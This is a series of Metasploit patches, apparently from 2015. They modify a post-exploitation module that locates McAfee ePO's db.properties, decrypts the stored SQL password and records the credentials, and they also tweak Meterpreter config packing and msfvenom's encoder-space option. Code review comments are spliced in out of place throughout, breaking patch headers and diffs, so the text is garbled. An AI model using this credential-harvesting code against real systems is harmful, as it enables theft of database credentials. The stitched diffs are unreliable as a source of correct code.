From 2721be946a741f47c797cf63c7ac5a099edd427a Mon Sep 17 00:00:00 2001
From: "Donny Maasland (Fox-IT)"
Date: Fri, 15 May 2015 14:28:12 +0200
Subject: [PATCH 1/8] also check Wow6432Node keys

---
 .../windows/gather/credentials/epo_sql.rb | 37 ++++++++++++++-----
 1 file changed, 27 insertions(+), 10 deletions(-)

diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb
index dbafe20150..a4fe21df56 100644
--- a/modules/post/windows/gather/credentials/epo_sql.rb
+++ b/modules/post/windows/gather/credentials/epo_sql.rb
@@ -31,20 +31,37 @@ class Metasploit3 < Msf::Post
 def run
 # Find out where things are installed
 print_status("Finding Tomcat install path...")
- subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator")
- if subkeys.nil? or subkeys.empty?
+
+ # Check both normal and Wow6432Node keys
+ subkeys =
+ [
+ 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator',
+ 'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator'
+ ]
+
+ epol_reg_keys = []
+ subkeys.each do |subkey|
+ key = registry_enumkeys(subkey)
+ if not key.nil?
+ epol_reg_keys.push(subkey)
+ end
+ end
+
+ if (epol_reg_keys.nil? or epol_reg_keys.empty?)
 print_error ("ePO 4.6 Not Installed or No Permissions to RegKey")
 return
 end
+
 # Get the db.properties file location
- epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator"
- dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder")
- if dbprops_file == nil or dbprops_file == ""
- print_error("Could not find db.properties file location")
- else
- dbprops_file << "/conf/orion/db.properties";
- print_good("Found db.properties location");
- process_config(dbprops_file);
+ epol_reg_keys.each do |epol_reg_key|
+ dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder")
+ if dbprops_file == nil or dbprops_file == ""
+ print_error("Could not find db.properties file location")
+ else
+ dbprops_file << "/conf/orion/db.properties";
+ print_good("Found db.properties location");
+ process_config(dbprops_file);
+ end
 end
 end

From dbe4f3f1c849c2c95281e5565120ec4d1c16149c Mon Sep 17 00:00:00 2001
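Review bot: The new guard `if (epol_reg_keys.nil? or epol_reg_keys.empty?)` can never take the `nil?` branch, because `epol_reg_keys` is initialised to `[]` a few lines earlier, and the per-key test `if not key.nil?` no longer rejects a key that exists but has no subkeys, which the removed `subkeys.empty?` check did. I would write `epol_reg_keys << subkey unless key.nil? || key.empty?` and `if epol_reg_keys.empty?`, and use `||` rather than `or` so the low-precedence operator cannot bite later. Patch 3/8 in this same series replaces this whole approach with a `REGISTRY_VIEW_32_BIT` lookup, so the point may be moot for the final state. The enclosing `run` method closes inside the hunk, but the class continues past it.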
From: OJ
Date: Mon, 18 May 2015 09:26:47 +1000
Subject: [PATCH 2/8] Adjust single pack statement, fix up some quotes

* Moved over to using single quotes for strings that don't need escaping or interpolation.
* Changed one pack spec to be "more correct". Thankfully, we were only packing 0 so the endianness isn't a problem, however it should be correct, hence the fix.
---
 lib/rex/payloads/meterpreter/config.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb
index a06a19ebca..74a306edb9 100644
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -39,7 +39,7 @@ private
 end
 def to_wchar_t(item, size)
- to_ascii(item, size).unpack("C*").pack("v*")
+ to_ascii(item, size).unpack('C*').pack('v*')
 end
 def to_ascii(item, size)
@@ -57,7 +57,7 @@ private
 uuid # the UUID
 ]
- session_data.pack("VVVA*")
+ session_data.pack('VVVA*')
 end
 def transport_block(opts)
@@ -117,7 +117,7 @@ private
 ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}", file_extension))
- extension_data = [ ext.length, ext ].pack("VA*")
+ extension_data = [ ext.length, ext ].pack('VA*')
 end
 def config_block
@@ -143,9 +143,9 @@ private
 # terminate the extensions with a 0 size
 if is_x86?
- config << [0].pack("V")
+ config << [0].pack('V')
 else
- config << [0].pack("Q")
+ config << [0].pack('Q<')
 end
 # and we're done

From 30f7c651c9dc753356fa66673131dd4b18ae65c0 Mon Sep 17 00:00:00 2001
From: "Donny Maasland (Fox-IT)"
Date: Mon, 18 May 2015 10:19:32 +0200
Subject: [PATCH 3/8] use REGISTRY_VIEW_32_BIT

---
 .../windows/gather/credentials/epo_sql.rb | 39 ++++++-------------
 1 file changed, 11 insertions(+), 28 deletions(-)

diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb
index a4fe21df56..7140a6a823 100644
--- a/modules/post/windows/gather/credentials/epo_sql.rb
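Review bot: `to_wchar_t` is not a UTF-16 transcoder: `unpack('C*').pack('v*')` widens every byte of `to_ascii(item, size)` to a 16-bit little-endian code unit, which is only correct while each byte is ASCII; a byte above 0x7F would become a code unit of the same value rather than the intended character. Since this hunk only changes quoting, I would at least state that contract above the method, `# Widen each byte to a UTF-16LE code unit; only valid for ASCII input, non-ASCII bytes are not transcoded.`, and if `item` can come from user-supplied configuration, consider `item.encode('UTF-16LE')` with the size handling applied afterwards. The body of `to_ascii` and every caller of `to_wchar_t` are outside this hunk.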
+++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -31,37 +31,20 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed print_status("Finding Tomcat install path...") - - # Check both normal and Wow6432Node keys - subkeys = - [ - 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator', - 'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator' - ] - - epol_reg_keys = [] - subkeys.each do |subkey| - key = registry_enumkeys(subkey) - if not key.nil? - epol_reg_keys.push(subkey) - end - end - - if (epol_reg_keys.nil? or epol_reg_keys.empty?) + subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT) + if subkeys.nil? or subkeys.empty? print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") return end - # Get the db.properties file location - epol_reg_keys.each do |epol_reg_key| - dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") - if dbprops_file == nil or dbprops_file == "" - print_error("Could not find db.properties file location") - else - dbprops_file << "/conf/orion/db.properties"; - print_good("Found db.properties location"); - process_config(dbprops_file); - end + epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" + dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT) + if dbprops_file == nil or dbprops_file == "" + print_error("Could not find db.properties file location") + else + dbprops_file << "/conf/orion/db.properties"; + print_good("Found db.properties location"); + process_config(dbprops_file); end end @@ -191,4 +174,4 @@ class Metasploit3 < Msf::Post end -end +end \ No newline at end of file From 7d650954725f7b651510532ed96f79cbefa54293 Mon Sep 17 00:00:00 2001 
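Review bot: The registry path `'HKLM\\Software\\Network Associates\\ePolicy Orchestrator'` is now written out twice in `run`, once in the `registry_enumkeys` probe and again as `epol_reg_key`; assigning `epol_reg_key` before the probe and calling `registry_enumkeys(epol_reg_key, REGISTRY_VIEW_32_BIT)` keeps the two lookups from drifting apart. `REGISTRY_VIEW_32_BIT` is the right replacement for the hand-rolled Wow6432Node walk of the previous patch, and a one-line comment saying that it selects the 32-bit view (presumably a no-op on a 32-bit host) would save the next reader the trip to the mixin. The second hunk also drops the trailing newline after the final `end` (`\ No newline at end of file`), which patch 7/8 then has to restore. `run` ends within the first hunk; the class continues past it.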
From: "Donny Maasland (Fox-IT)" Date: Mon, 18 May 2015 12:20:42 +0200 Subject: [PATCH 4/8] fix quotes --- .../windows/gather/credentials/epo_sql.rb | 82 +++++++++---------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7140a6a823..4c7a3cf4ec 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' require 'rex' -require "net/dns/resolver" +require 'net/dns/resolver' require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post 
@@ -30,20 +30,20 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed - print_status("Finding Tomcat install path...") - subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT) + print_status('Finding Tomcat install path...') + subkeys = registry_enumkeys('HKLM\\Software\\Network Associates\\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT) if subkeys.nil? or subkeys.empty? - print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") + print_error ('ePO 4.6 Not Installed or No Permissions to RegKey') return end # Get the db.properties file location - epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" - dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT) - if dbprops_file == nil or dbprops_file == "" - print_error("Could not find db.properties file location") + epol_reg_key = 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator' + dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT) + if dbprops_file == nil or dbprops_file == '' + print_error('Could not find db.properties file location') else - dbprops_file << "/conf/orion/db.properties"; - print_good("Found db.properties location"); + dbprops_file << '/conf/orion/db.properties'; + print_good('Found db.properties location'); process_config(dbprops_file); end end 
@@ -57,39 +57,39 @@ class Metasploit3 < Msf::Post line.chomp line_array = line.split('=') case line_array[0] - when "db.database.name" - database_name = "" + when 'db.database.name' + database_name = '' line_array[1].each_byte { |x| database_name << x unless x > 126 || x < 32 } - when "db.instance.name" - database_instance = "" + when 'db.instance.name' + database_instance = '' line_array[1].each_byte { |x| database_instance << x unless x > 126 || x < 32 } - when "db.user.domain" - user_domain = "" + when 'db.user.domain' + user_domain = '' line_array[1].each_byte { |x| user_domain << x unless x > 126 || x < 32 } - when "db.user.name" - user_name = "" + when 'db.user.name' + user_name = '' line_array[1].each_byte { |x| user_name << x unless x > 126 || x < 32 } - when "db.port" - port = "" + when 'db.port' + port = '' line_array[1].each_byte { |x| port << x unless x > 126 || x < 32 } - when "db.user.passwd.encrypted.ex" + when 'db.user.passwd.encrypted.ex' # ePO 4.6 encrypted password - passwd = "" + passwd = '' line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } - passwd.gsub("\\","") + passwd.gsub('\\','') # Add any Base64 padding that may have been stripped out - passwd << "=" until ( passwd.length % 4 == 0 ) + passwd << '=' until ( passwd.length % 4 == 0 ) plaintext_passwd = decrypt46(passwd) - when "db.user.passwd.encrypted" + when 'db.user.passwd.encrypted' # ePO 4.5 encrypted password - not currently supported, see notes below - passwd = "" + passwd = '' line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } - passwd.gsub("\\","") + passwd.gsub('\\','') # Add any Base64 padding that may have been stripped out - passwd << "=" until ( passwd.length % 4 == 0 ) - plaintext_passwd = "PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP" - when "db.server.name" - database_server_name = "" + passwd << '=' until ( passwd.length % 4 == 0 ) + plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP' + when 
'db.server.name' + database_server_name = '' line_array[1].each_byte { |x| database_server_name << x unless x > 126 || x < 32 } end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post result = client.net.resolve.resolve_host(database_server_name) if result[:ip].nil? or result[:ip].empty? - print_error("Could not determine IP of DB - credentials not added to report database") + print_error('Could not determine IP of DB - credentials not added to report database') return end @@ -111,11 +111,11 @@ class Metasploit3 < Msf::Post print_good("Database IP: #{db_ip}") end print_good("Port: #{port}") - if user_domain == nil or user_domain == "" - print_good("Authentication Type: SQL"); + if user_domain == nil or user_domain == '' + print_good('Authentication Type: SQL'); full_user = user_name else - print_good("Authentication Type: Domain"); + print_good('Authentication Type: Domain'); print_good("Domain: #{user_domain}"); full_user = "#{user_domain}\\#{user_name}" end @@ -127,8 +127,8 @@ class Metasploit3 < Msf::Post service_data = { address: Rex::Socket.getaddress(db_ip), port: port, - protocol: "tcp", - service_name: "mssql", + protocol: 'tcp', + service_name: 'mssql', workspace_id: myworkspace_id } 
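Review bot: In both password branches `passwd.gsub('\\','')` discards its return value, so the backslashes the line is meant to strip are still in `passwd` when it is padded and passed to `decrypt46`; it needs to be `passwd.gsub!('\\', '')` or `passwd = passwd.delete('\\')`. `line.chomp` at the top of the loop is a no-op for the same reason. `line.split('=')` also drops everything after a second `=` (trailing `=` padding is what forces the re-padding loop below); `key, value = line.split('=', 2)` keeps the value intact. This hunk only changes quote style, so these are pre-existing defects, and `process_config` starts before the hunk.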
@@ -145,21 +145,21 @@ class Metasploit3 < Msf::Post login_data = { core: credential_core, - access_level: "User", + access_level: 'User', status: Metasploit::Model::Login::Status::UNTRIED } create_credential_login(login_data.merge(service_data)) - print_good("Added credentials to report database") + print_good('Added credentials to report database') else - print_error("Could not determine IP of DB - credentials not added to report database") + print_error('Could not determine IP of DB - credentials not added to report database') end end def decrypt46(encoded) encrypted_data = Rex::Text.decode_base64(encoded) - aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB") + aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB') aes.padding = 0 aes.decrypt # Private key extracted from ePO 4.6.0 Build 1029 From e1eed6e9d9566bf7e2fe04743c377a436e80c8fe Mon Sep 17 00:00:00 2001 From: "Donny Maasland (Fox-IT)" Date: Mon, 18 May 2015 16:33:57 +0200 Subject: [PATCH 5/8] single quotes and slashes.. --- modules/post/windows/gather/credentials/epo_sql.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 4c7a3cf4ec..9e12f75297 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb 
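Review bot: `OpenSSL::Cipher::Cipher.new('AES-128-ECB')` uses the long-deprecated alias; `OpenSSL::Cipher.new('AES-128-ECB')` is the supported spelling and behaves identically here. More importantly, `aes.padding = 0` leaves the block padding in the plaintext, and the later `password.gsub!(/[^[:print:]]/,'')` (visible in the context of patch 7/8) removes it by deleting every non-printable byte, which also deletes any legitimate non-ASCII character in the password and would silently corrupt such credentials. If the stored value is PKCS#7-padded, which a Java AES/ECB default transformation would produce, strip by the final byte's value instead: `pad = plaintext.bytes.last; plaintext = plaintext[0...-pad] if pad.between?(1, 16)`. The rest of `decrypt46`, including the hard-coded key, lies outside this hunk.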
@@ -31,13 +31,13 @@ class Metasploit3 < Msf::Post
 def run
 # Find out where things are installed
 print_status('Finding Tomcat install path...')
- subkeys = registry_enumkeys('HKLM\\Software\\Network Associates\\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
+ subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
 if subkeys.nil? or subkeys.empty?
 print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')
 return
 end
 # Get the db.properties file location
- epol_reg_key = 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator'
+ epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'
 dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)
 if dbprops_file == nil or dbprops_file == ''
 print_error('Could not find db.properties file location')

From a82168d7bb89a257dd40f21e0b9d896fa4f4d7b1 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 18 May 2015 14:27:52 -0500
Subject: [PATCH 6/8] Fixes #5361 by adding --encoder-space to msfvenom

---
 lib/msf/core/payload_generator.rb | 9 +++++++--
 msfvenom | 4 ++++
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index 4bc6c1fe7c..b7feb2ffee 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -64,6 +64,9 @@ module Msf
 # @!attribute space
 # @return [Fixnum] The maximum size in bytes of the payload
 attr_accessor :space
+ # @!attribute encoder_space
+ # @return [Fixnum] The maximum size in bytes of the encoded payload
+ attr_accessor :encoder_space
 # @!attribute stdin
 # @return [String] The raw bytes of a payload taken from STDIN
 attr_accessor :stdin
@@ -85,6 +88,7 @@ module Msf
 # @option opts [String] :badchars (see #badchars)
 # @option opts [String] :template (see #template)
 # @option opts [Fixnum] :space (see #space)
+ # @option opts [Fixnum] :encoder_space (see #encoder_space)
 # @option opts [Fixnum] :nops (see #nops)
 # @option opts [String] :add_code (see #add_code)
 # @option opts [Boolean] :keep (see #keep)
@@ -109,6 +113,7 @@ module Msf
 @stdin = opts.fetch(:stdin, nil)
 @template = opts.fetch(:template, '')
 @var_name = opts.fetch(:var_name, 'buf')
+ @encoder_space = opts.fetch(:encoder_space, @space)
 @framework = opts.fetch(:framework)
@@ -200,7 +205,7 @@ module Msf
 encoder_list.each do |encoder_mod|
 cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
 begin
- encoder_mod.available_space = @space
+ encoder_mod.available_space = @encoder_space
 return run_encoder(encoder_mod, shellcode.dup)
 rescue ::Msf::EncoderSpaceViolation => e
 cli_print "#{encoder_mod.refname} failed with #{e.message}"
@@ -395,7 +400,7 @@ module Msf
 iterations.times do |x|
 shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list)
 cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})"
- if shellcode.length > space
+ if shellcode.length > encoder_space
 raise EncoderSpaceViolation, "encoder has made a buffer that is too big"
 end
 end
diff --git a/msfvenom b/msfvenom
index bc28223e5b..01b93a016c 100755
--- a/msfvenom
+++ b/msfvenom
@@ -97,6 +97,10 @@ require 'msf/core/payload_generator'
 opts[:space] = s
 end
+ opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
+ opts[:encoder_space] = s
+ end
+
 opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
 opts[:badchars] = Rex::Text.hex_to_raw(b)
 end

From 79db696c15d859b21b5c65f0b2383f508a1230e3 Mon Sep 17 00:00:00 2001
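Review bot: `@encoder_space = opts.fetch(:encoder_space, @space)` only falls back to `@space` when the key is absent; a caller that passes `encoder_space: nil` explicitly gets `nil`, and `shellcode.length > encoder_space` in `run_encoder` then fails with a comparison error instead of the intended `EncoderSpaceViolation`. `@encoder_space = opts.fetch(:encoder_space, nil) || @space` covers both cases, and because msfvenom declares `--encoder-space` as a bare `Integer`, a zero or negative value should be rejected at the same point rather than making every encoder fail one by one. This line also assumes `@space` has already been assigned earlier in `initialize`, which is not visible in the hunk. Both `initialize` and `run_encoder` start before their hunks.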
From: Brent Cook
Date: Mon, 18 May 2015 15:46:55 -0500
Subject: [PATCH 7/8] fix EOL character

---
 modules/post/windows/gather/credentials/epo_sql.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb
index 9e12f75297..7abf8eb39a 100644
--- a/modules/post/windows/gather/credentials/epo_sql.rb
+++ b/modules/post/windows/gather/credentials/epo_sql.rb
@@ -172,6 +172,5 @@ class Metasploit3 < Msf::Post
 password.gsub!(/[^[:print:]]/,'')
 return password
 end
+end
-
-end
\ No newline at end of file

From fb43ef4494b2b2a0f33687f19920519ff26146d7 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 18 May 2015 16:39:52 -0500
Subject: [PATCH 8/8] realign msfvenom help text

---
 msfvenom | 57 ++++++++++++++++++++++++++++----------------------------
 1 file changed, 29 insertions(+), 28 deletions(-)

diff --git a/msfvenom b/msfvenom
index 01b93a016c..e1662539e8 100755
--- a/msfvenom
+++ b/msfvenom
@@ -58,7 +58,8 @@ require 'msf/core/payload_generator'
 opt.separator('')
 opt.separator('Options:')
- opt.on('-p', '--payload ', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
+ opt.on('-p', '--payload ', String,
+ 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
 if p == '-'
 opts[:payload] = 'stdin'
 else
@@ -66,54 +67,67 @@ require 'msf/core/payload_generator' end end - opt.on('-l', '--list [module_type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true + end + + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| if l.nil? or l.empty? l = ["all"] end opts[:list] = l end - opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| opts[:nops] = n.to_i end - opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| + opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| opts[:format] = f end - opt.on('-e', '--encoder [encoder]', String, 'The encoder to use') do |e| + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder ', String, 'The encoder to use') do |e| opts[:encoder] = e end - opt.on('-a', '--arch ', String, 'The architecture to use') do |a| + opt.on('-a', '--arch ', String, 'The architecture to use') do |a| opts[:arch] = a end - opt.on('--platform ', String, 'The platform of the payload') do |l| + opt.on('--platform ', String, 'The platform of the payload') do |l| opts[:platform] = l end - opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| + opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| opts[:space] = s end - opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the 
-s value)') do |s| + opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| opts[:encoder_space] = s end - opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| opts[:badchars] = Rex::Text.hex_to_raw(b) end - opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| + opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| opts[:iterations] = i end - opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| + opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| opts[:add_code] = x end - opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| + opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| opts[:template] = x end @@ -121,15 +135,11 @@ require 'msf/core/payload_generator' opts[:keep] = true end - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true - end - - opt.on('-o', '--out ', 'Save the payload') do |x| + opt.on('-o', '--out ', 'Save the payload') do |x| opts[:out] = x end - opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| + opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| opts[:var_name] = x end 
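Review bot: `opt.on('--help-formats', String, "List available formats") do` declares a `String` argument for a switch that takes none; OptionParser treats a class argument as an implied required value, so `msfvenom --help-formats` on its own would presumably raise `OptionParser::MissingArgument`, which the `rescue OptionParser::InvalidOption` later in this file does not catch. Dropping the class, `opt.on('--help-formats', 'List available formats') do`, makes it a plain flag; the definition is carried over from the removed `on_tail` block, so the defect is pre-existing rather than introduced by the move. The relocated `--payload-options` switch is declared correctly and needs no change. The option-building block starts before this hunk and ends after it.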
@@ -137,15 +147,6 @@ require 'msf/core/payload_generator' raise UsageError, "#{opt}" end - opt.on_tail('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - begin opt.parse!(args) rescue OptionParser::InvalidOption => e